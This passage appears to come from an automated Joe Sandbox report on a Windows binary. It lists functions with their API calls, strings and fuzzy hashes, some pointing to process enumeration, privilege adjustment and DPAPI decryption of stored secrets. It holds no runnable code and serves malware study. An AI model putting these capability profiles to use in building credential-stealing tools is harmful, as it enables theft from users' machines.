                                                                                                    • Instruction Fuzzy Hash: D4027E32A18B9685FB10DF69E84036EB7A5FB89B94F540235EE9C13B98DF78D481C710
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                    • String ID: [PID:
                                                                                                    • API String ID: 1946380282-2210602247
                                                                                                    • Opcode ID: 2a77548614a6a962c075d3f7b49583f0be03757688cfd80121847701f37274ed
                                                                                                    • Instruction ID: dc28ceb687ee7b10cf4dd0c5e6986aa7f082ec8989ff401c1fbe55700e2e516d
                                                                                                    • Opcode Fuzzy Hash: 2a77548614a6a962c075d3f7b49583f0be03757688cfd80121847701f37274ed
                                                                                                    • Instruction Fuzzy Hash: DDE1B472A18BC185E720EF25E4803EDB7A1FB89B94F944635EA9D07B99DF38D640C710
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 3668304517-0
                                                                                                    • Opcode ID: 26448f67865e6e62aac5c21961d5f8cbc45babdff8ed66c86881f54e24fef089
                                                                                                    • Instruction ID: b9fa6123c439d92adab5594b27bed4ef0088fc6a4605ffc288b9eea7c929e70f
                                                                                                    • Opcode Fuzzy Hash: 26448f67865e6e62aac5c21961d5f8cbc45babdff8ed66c86881f54e24fef089
                                                                                                    • Instruction Fuzzy Hash: A5726E72A19BC589EB209F65E8403ADB3A1FB89798F544335EADC17B99DF38D140C710
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$PointerReadSize_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID: exists$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                    • API String ID: 2478245620-15404121
                                                                                                    • Opcode ID: 8bb140352be7690a3ef2351056c6da897ec86c921e423387d734bbc8aa70d5de
                                                                                                    • Instruction ID: c04e7f250aafc12b377ab82304fd10a2f20d7f6b2fb01cae96a55e7a23e1e9ea
                                                                                                    • Opcode Fuzzy Hash: 8bb140352be7690a3ef2351056c6da897ec86c921e423387d734bbc8aa70d5de
                                                                                                    • Instruction Fuzzy Hash: E3324832A04BC68AEB20DF34D8803ED77A1FB84B48F848676DA4D47A99EF79D545C710
                                                                                                    APIs
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75A712E81
                                                                                                      • Part of subcall function 00007FF75A7124E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75A7124FC
                                                                                                      • Part of subcall function 00007FF75A70D3C8: RtlFreeHeap.NTDLL ref: 00007FF75A70D3DE
                                                                                                      • Part of subcall function 00007FF75A70D3C8: GetLastError.KERNEL32 ref: 00007FF75A70D3E8
                                                                                                      • Part of subcall function 00007FF75A708284: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF75A708233,?,?,?,?,-2723E8D8DEBC5093,00007FF75A70811E), ref: 00007FF75A70828D
                                                                                                      • Part of subcall function 00007FF75A708284: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF75A708233,?,?,?,?,-2723E8D8DEBC5093,00007FF75A70811E), ref: 00007FF75A7082B2
                                                                                                      • Part of subcall function 00007FF75A71BA84: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75A71B9CF
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75A712E70
                                                                                                      • Part of subcall function 00007FF75A712548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75A71255C
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75A7130E6
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75A7130F7
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75A713108
                                                                                                    • GetTimeZoneInformation.KERNEL32(00007FF75A7133F8), ref: 00007FF75A71312F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                    • API String ID: 4070488512-239921721
                                                                                                    • Opcode ID: 6ff4704e37b1592320c13e659d1f856dd22dc212be1b833c6838491f576543a9
                                                                                                    • Instruction ID: 5c18e19afb0dbc6f2981d90310b0f0ee9b7d2519aac444d80b9df067ea0c2165
                                                                                                    • Opcode Fuzzy Hash: 6ff4704e37b1592320c13e659d1f856dd22dc212be1b833c6838491f576543a9
                                                                                                    • Instruction Fuzzy Hash: D2D1B162E0824286FB60BF25D8515B9E7A1FF8CB94FC84876EE1D47685DF3CE44187A0
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                    • String ID:
                                                                                                    • API String ID: 1617910340-0
                                                                                                    • Opcode ID: 9219a76bbf5b0a68fd8075754a2c2160bfaa822f6e476498c8a23ea95eed312f
                                                                                                    • Instruction ID: bec5ac3f074fb654805e8482334b0097af4466f672c235e4a82a5d4219f01f96
                                                                                                    • Opcode Fuzzy Hash: 9219a76bbf5b0a68fd8075754a2c2160bfaa822f6e476498c8a23ea95eed312f
                                                                                                    • Instruction Fuzzy Hash: B0C1CF37B24A4586FB10EF65C4902AC7B61FB4DB98F894676DA1E5B794CF38D412C310
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                    • API String ID: 3458911817-239921721
                                                                                                    • Opcode ID: 12951480f3fe79566017d45e51369301be5158125170c6a9e6aaf334c955a331
                                                                                                    • Instruction ID: dcd95761984d8fce296581b731d48d39dea6657d36d9b99113b5c75238694a5b
                                                                                                    • Opcode Fuzzy Hash: 12951480f3fe79566017d45e51369301be5158125170c6a9e6aaf334c955a331
                                                                                                    • Instruction Fuzzy Hash: 39519132E0864296F750FF21E8914A9E7A0FF4C784FC859B6EA1D43696DF3CE40187A4
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 1405656091-0
                                                                                                    • Opcode ID: cd6fea744430340711cd49b3e9bdbfdb1b852b0eb5a7692198664b91c055b650
                                                                                                    • Instruction ID: a7b980611740eedfd6e32c40b1e5ac1f9b14b7fdcaf48236bf3527d493084f86
                                                                                                    • Opcode Fuzzy Hash: cd6fea744430340711cd49b3e9bdbfdb1b852b0eb5a7692198664b91c055b650
                                                                                                    • Instruction Fuzzy Hash: 1181C9B2F042464BFB589F24CD413B9A395FF58788F889535DA0D4A789EF3CE5408B50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                    • String ID: cores
                                                                                                    • API String ID: 3668304517-2370456839
                                                                                                    • Opcode ID: 31f0030ddac62d43ccb76350325948b38685225ff49a737a645bd96adc2c858d
                                                                                                    • Instruction ID: aeeaa6e09f0115f0046b22c7c7aeff538434a29a6665b9f2557b9ee2d7de4d76
                                                                                                    • Opcode Fuzzy Hash: 31f0030ddac62d43ccb76350325948b38685225ff49a737a645bd96adc2c858d
                                                                                                    • Instruction Fuzzy Hash: E2C10863E08B8289F710DF78D4413ACB762FB997A8F545735EA9C12A9ADF38D181C350
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3038321057-0
                                                                                                    • Opcode ID: d2de06470b4ed8e39d37734a47601b9eff7cf65b32299141bc4bcc42cf026e17
                                                                                                    • Instruction ID: f89bec7e33bb302d65c9cd37ab770014a8852ac727617e3c88042a0ada6463a3
                                                                                                    • Opcode Fuzzy Hash: d2de06470b4ed8e39d37734a47601b9eff7cf65b32299141bc4bcc42cf026e17
                                                                                                    • Instruction Fuzzy Hash: E7215E32618B8186F7609F21F44436AB7A0FF8CB80F994536EA8D43B58DF7CD5458B50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 87a99c1df3fb55db6fd33c27e8c6a0857421fa2f76207b6e5e3cbf5a607462fc
                                                                                                    • Instruction ID: 9e9b9a5bffd1fe1eeba07a910fca267daf3ef5fd9db5b606ef92e6a478a3b6c6
                                                                                                    • Opcode Fuzzy Hash: 87a99c1df3fb55db6fd33c27e8c6a0857421fa2f76207b6e5e3cbf5a607462fc
                                                                                                    • Instruction Fuzzy Hash: ABF17072A09B858AEB208F69E44135DB7A1FB8C798F104365EEDC57B99EF3CC1908744
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: edb7384006dd180f83d3e92ce02a280bc4dafbd9889c959d182341696efc5bee
                                                                                                    • Instruction ID: d28aeddae5bb1dd6b9a7387edcd154d5d6e9e6996813ccd5731ccfdc874c853e
                                                                                                    • Opcode Fuzzy Hash: edb7384006dd180f83d3e92ce02a280bc4dafbd9889c959d182341696efc5bee
                                                                                                    • Instruction Fuzzy Hash: 73F16F32A09F858AEB208B69E44135DB7A1FB8C798F505325EEDC57B99EF3CD1808744
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f7027e56b770e5601c3c4cdc81840c584ded037678ea2b3a9d54ded7bc101ed1
                                                                                                    • Instruction ID: a99c81e4c887ab0082c8d2fb3c57af37e91cb60ee984a77ccbbccf0521adf972
                                                                                                    • Opcode Fuzzy Hash: f7027e56b770e5601c3c4cdc81840c584ded037678ea2b3a9d54ded7bc101ed1
                                                                                                    • Instruction Fuzzy Hash: 8AF15E72A09B848AEB208B69E44135DB7A1FB8C798F504325EEDC56B99EF38D1808744
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InformationTimeZone
                                                                                                    • String ID: [UTC
                                                                                                    • API String ID: 565725191-1715286942
                                                                                                    • Opcode ID: 227df7f9fc515862566a01e59866b53c9bfa63972a69ca4c12e822ae5807cade
                                                                                                    • Instruction ID: 8f03e789114fe4d9e44f5f4d9f50fa6abdc6bcb8440f148f8cfc1640af360195
                                                                                                    • Opcode Fuzzy Hash: 227df7f9fc515862566a01e59866b53c9bfa63972a69ca4c12e822ae5807cade
                                                                                                    • Instruction Fuzzy Hash: 64B15E32A08FC989E7318F29E84129AB7A1F79C788F545325EACC57B59EF78D250C740
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DriveLogicalStrings
                                                                                                    • String ID:
                                                                                                    • API String ID: 2022863570-0
                                                                                                    • Opcode ID: 8f7b76c8c7a97eafc7baaa1f30fd7dfc3995e14b8cd39339a4877971754c2c66
                                                                                                    • Instruction ID: f323a60088c3fccd11ccaaf68d1a465e366b88b41e78168bb87ea8cb46332a50
                                                                                                    • Opcode Fuzzy Hash: 8f7b76c8c7a97eafc7baaa1f30fd7dfc3995e14b8cd39339a4877971754c2c66
                                                                                                    • Instruction Fuzzy Hash: 52517132E08B8582F7109F24E8803ADB7A5FB84794F545235EA9C13AA9DF7CE591D740
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CryptDataFreeLocalUnprotect
                                                                                                    • String ID:
                                                                                                    • API String ID: 1561624719-0
                                                                                                    • Opcode ID: 3f0d2640eba4d0f7871c2ec703edcb503dbe0d7ea7d03094cd3af9045bbe76bf
                                                                                                    • Instruction ID: cc99a804fb7117c593d3b3ed1bd6c07706ffe1ebb50c0ae09200b8c7f18b3feb
                                                                                                    • Opcode Fuzzy Hash: 3f0d2640eba4d0f7871c2ec703edcb503dbe0d7ea7d03094cd3af9045bbe76bf
                                                                                                    • Instruction Fuzzy Hash: 9F414732A18B81CAF3209F74D4403AD77A5FB58B4CF484679EA8C06A4ADF79D5A48354
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 3668304517-0
                                                                                                    • Opcode ID: b1b5a1a327eb7fdbbdef193e3a0b2110c79f99af1ed725dc7dd222eaa80ed354
